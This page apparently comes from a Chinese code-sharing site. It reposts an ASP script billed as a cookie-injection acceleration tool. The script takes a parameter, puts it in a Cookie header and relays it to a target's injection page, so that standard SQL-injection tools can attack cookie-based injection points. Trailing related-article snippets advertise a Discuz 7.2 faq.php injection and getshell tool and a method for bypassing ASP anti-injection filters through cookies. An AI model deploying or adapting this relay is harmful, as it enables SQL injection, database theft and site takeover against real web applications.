ASP版实现cookies注入加速工具

来源:职业欠钱&zj1244共用的public Blog

复制代码 代码如下:

<% 

Str="xxxid="&escape(request("FK")) 

Url="http://xxx.chinaxxx.com/injection.asp" 

response.write PostData(Url,Str)

Function PostData(PostUrl,PostCok)  

Dim Http 

Set Http = Server.CreateObject("msxml2.serverXMLHTTP") 

With Http

.Open "GET",PostUrl,False 

.SetRequestHeader "Cookie",PostCok 

.Send 

PostData = .ResponseBody 

End With 

Set Http = Nothing 

PostData =bytes2BSTR(PostData) 

End Function

Function bytes2BSTR(vIn) 

Dim strReturn 

Dim I, ThisCharCode, NextCharCode 

strReturn = "" 

For I = 1 To LenB(vIn) 

ThisCharCode = AscB(MidB(vIn, I, 1)) 

If ThisCharCode < &H80 Then 

strReturn = strReturn & Chr(ThisCharCode) 

Else 

NextCharCode = AscB(MidB(vIn, I + 1, 1)) 

strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 

I = I + 1 

End If 

Next 

bytes2BSTR = strReturn 

End Function

%>

时间: 2024-10-22 18:25:03

ASP版实现cookies注入加速工具的相关文章

ASP版实现cookies注入加速工具_应用技巧

来源:职业欠钱&zj1244共用的public Blog 复制代码 代码如下: <%  Str="xxxid="&escape(request("FK"))  Url="http://xxx.chinaxxx.com/injection.asp"  response.write PostData(Url,Str)  Function PostData(PostUrl,PostCok)   Dim Http  Set Http

Python写的Discuz7.2版faq.php注入漏洞工具_python

Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据,python 版的uc_key getshell部分的代码来自网上(感谢作者) 实现代码: #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: gb2312 -*- # -*- coding: utf_8 -*- # author iswin import sys import hashlib import time import math im

通过cookies注入破解ASP通用防注入程序

在一次网站被注入木马后,很是郁闷,网站已经放入了通用的ASP防注入程序,但依然被注入. 在查阅了大量的资料后,终于发现了问题所在. 现在很多网站都加了防注入系统代码,你输入注入语句将无法注入~~感觉这样的防注入系统不错,但防注入系统没有注意到 Cookies 的问题!所以就有了Cookies注入~~ 我们来研究一下怎样情况下才会有Cookies注入!如果你学过ASP你应该会知道 Request.QueryString (GET) 或 Request.Form (POST)!呵,没错,这就是我们用

51Window脚本收藏源代码Asp版 下载_常用工具

脚本收藏Asp版 目录页(dir.htm)面改自:myhyli的网页(http://www.blueidea.com/user/myhyli) -------------------- 用户:haiwa 密码:51windows.com -------------------- 添加脚本时,只要把名称,类别,代码:填上就行,代码为html代码! -------------------- 同时可以做成网络收藏夹用 把dirurl.asp改名为dir.asp 添加网址时,只要把名称,类别,网址填上就

仿爱站网站长查询网站源码下载(ASP版)

 爱站网,懂点SEO的朋友应该都知道吧.使用爱站网的站长工具可以很方便快速的查询到很多有关网站的相关信息,比如基本的SEO信息,同IP下有多少个网站,备案相关信息,域名年龄,网站速度,服务器等相关信息.下面作者和大家分享一份在网上看到的使用ASP开发的伪爱站网程序的源码. 软件名称:伪爱站网站长工具 软件运行环境:ASP+ACCESS 软件大小:7.43 MB 软件语言:简体中文 是否有后台 有(全局管理) 安装说明: 此工具为ASP版,请检查自己的服务器是否支持该语言!如果支持的话,直接上传文

asp中cookie欺骗/注入原理与防范

  ASP获取参数主要有下面两种: Request.QueryString (GET) 或 Request.Form (POST) 我们有时为了简化代码,会写成 ID=Request("ID"),正是因为这样写法出现了问题-- 原来WEB服务是这样读取数据的: 先取GET中的数据,没有再取POST中的数据,还会去取Cookies中的数据!这个我也才发现. 通常的防注入系统,他会检测GET和POST中的数据,如果有特殊字符就禁止数据的提交,而上面简略写法,就不会被check 到. 举例说

大体积文件拷贝加速工具

相信大家都有这样的经历,使用Windows系统本身提供的文件复制和移动功能,虽然能够满足一般情况下的操作,但在拷贝文件量较大时,经常会出现力不从心的感觉,常常要占用很长时间才可结束.那么有没有什么工具可以加速拷贝呢? 本期笔者就为大家推荐一款国外开发的文件复制加速软件ExtremeCopy,该软件无论在WindowsXP,还是在Windows7都能获得比系统自带的复制功能要快20%~120%的性能提升.根据官方的视频显示其不仅比Windows7自带的文件复制功能要快,甚至还比很多同类拷贝加速软件

ASP与ASP.NET互通COOKIES的一点经验

asp.net|cookie|cookies    在微软推出.NET并进行了大规模的推广普及之后,ASP.NET逐渐进入了信息化系统开发的主流.但与此同时,而用ASP开发的旧系统面则临被整合,这时,面临一个问题:ASP与ASP.NET互相整合时,其中文COOKIES信息无法被互通共享,当使用ASP.NET写入中文COOKIES信息后,使用ASP进行读取,读出来的却是乱码,而非中文.    后来通过查找资料,不停地实践,终于找到了问题的根源,中文COOKIES信息在ASP中无法被正确读取得原因为

构建ASP.NET网站十大必备工具

构建ASP.NET网站十大必备工具 最近使用ASP.NET为公司构建了一个简单的公共网站(该网站的地址:http://superexpert.com/).在这个过程中,我们使用了数量很多的免费工具,如果把构建ASP.NET网站的必备工具总结一下,将会是一件十分有趣的事情.这些工具既支持ASP.NET Web Forms又支持ASP.NET MVC. 性能工具 读了两本关于网站的前端性能的书(这两本优秀的图书分别是:<High Performance Web Sites> 和 <Even